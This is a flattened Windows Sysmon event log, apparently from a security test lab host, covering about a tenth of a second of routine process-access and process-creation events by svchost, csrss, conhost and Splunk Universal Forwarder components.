12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.239{266CAFBE-647E-6064-4000-00000000AE01}38603864C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.235{266CAFBE-647E-6064-4100-00000000AE01}3872C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647E-6064-4000-00000000AE01}3860C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.221{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}3860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.221{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.221{266CAFBE-647E-6064-3F00-00000000AE01}38403844C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{00000000-0000-0000-0000-000000000000}3860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.223{266CAFBE-647E-6064-4000-00000000AE01}3860C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.205{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.205{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.205{266CAFBE-647E-6064-3E00-00000000AE01}38283832C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.208{266CAFBE-647E-6064-3F00-00000000AE01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.190{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.190{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.190{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.201{266CAFBE-647E-6064-3E00-00000000AE01}3828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x80000000000000001926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.190{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:02.174{266CAFBE-646A-6064-0A00-00000000AE01}840\Winsock2\CatalogChangeListener-348-0C:\Windows\system32\services.exe 10341000x80000000000000001924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.174{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-3D00-00000000AE01}3796C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.174{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001918Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001917Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001916Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001915Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:02.158{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32